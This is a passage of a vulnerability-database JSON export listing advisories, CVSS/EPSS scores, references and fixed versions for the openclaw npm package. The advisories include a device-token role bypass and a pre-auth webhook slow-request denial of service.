SA-vfp4-8x56-j7c5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43584","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43584"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-insufficient-environment-variable-denylist-in-exec-policy","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/U
I:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:02:18Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-insufficient-environment-variable-denylist-in-exec-policy"},{"reference_url":"https://github.com/advisories/GHSA-vfp4-8x56-j7c5","reference_id":"GHSA-vfp4-8x56-j7c5","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vfp4-8x56-j7c5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability"
:"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["CVE-2026-43584","GHSA-vfp4-8x56-j7c5"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zu4s-jnn3-1kd8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90353?format=json","vulnerability_id":"VCID-zunq-wnnf-k3fw","summary":"## Impact\n\nOpenClaw `device.token.rotate` mints tokens for unapproved roles, bypassing device role-upgrade pairing.\n\nDevice token rotation could mint or preserve roles/scopes that had not gone through the intended pairing approval.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= v2026.04.01`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. 
The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @nicky-cc  of Tencent zhuque Lab ([https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard)) for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42422","reference_id":"","reference_type":"","scores":[{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.1604","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.15986","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.1603","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42422"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","sco
ring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:03:32Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-whf9-3hcx-gq54","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:03:32Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-whf9-3hcx-gq54"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42422","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42422"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-role-bypass-in-device-token-rotate-function","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7.7","scoring_system":"cvssv4","scoring_element
s":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:03:32Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-role-bypass-in-device-token-rotate-function"},{"reference_url":"https://github.com/advisories/GHSA-whf9-3hcx-gq54","reference_id":"GHSA-whf9-3hcx-gq54","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-whf9-3hcx-gq54"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID
-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-42422","GHSA-whf9-3hcx-gq54"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"7.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zunq-wnnf-k3fw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50592?format=json","vulnerability_id":"VCID-zwzb-t4a7-tff8","summary":"OpenClaw has pre-auth webhook body parsing that can enable unauthenticated slow-request DoS\nOpenClaw webhook handlers for BlueBubbles and Google Chat accepted and parsed request bodies before authentication and signature checks on vulnerable releases. 
This allowed unauthenticated clients to hold parser work open with slow/oversized request bodies and degrade availability (slow-request DoS).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32011","reference_id":"","reference_type":"","scores":[{"value":"0.0009","scoring_system":"epss","scoring_elements":"0.25486","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0009","scoring_system":"epss","scoring_elements":"0.25531","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0009","scoring_system":"epss","scoring_elements":"0.25545","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32011"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d3e8b17aa6432536806b4853edc7939d891d0f25","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-20T15:03:36Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d3e8b17aa6432536806b4853edc7939d891d0f25"},{"reference_url":"https://www.vulncheck.com/advisorie
s/openclaw-slow-request-denial-of-service-via-pre-auth-webhook-body-parsing","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-20T15:03:36Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-slow-request-denial-of-service-via-pre-auth-webhook-body-parsing"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32011","reference_id":"CVE-2026-32011","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32011"},{"reference_url":"https://github.com/advisories/GHSA-x4vp-4235-65hg","reference_id":"GHSA-x4vp-4235-65hg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-x4vp-4235-65hg"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-x4vp-4235-65hg","reference_id":"GHSA-x4vp-4235-65hg","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:
N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-20T15:03:36Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-x4vp-4235-65hg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74401?format=json","purl":"pkg:npm/openclaw@2026.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xb
at"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7
e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yq
fz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j6nj-gf5b-1khk"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jad8-5duz-dqg1"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnera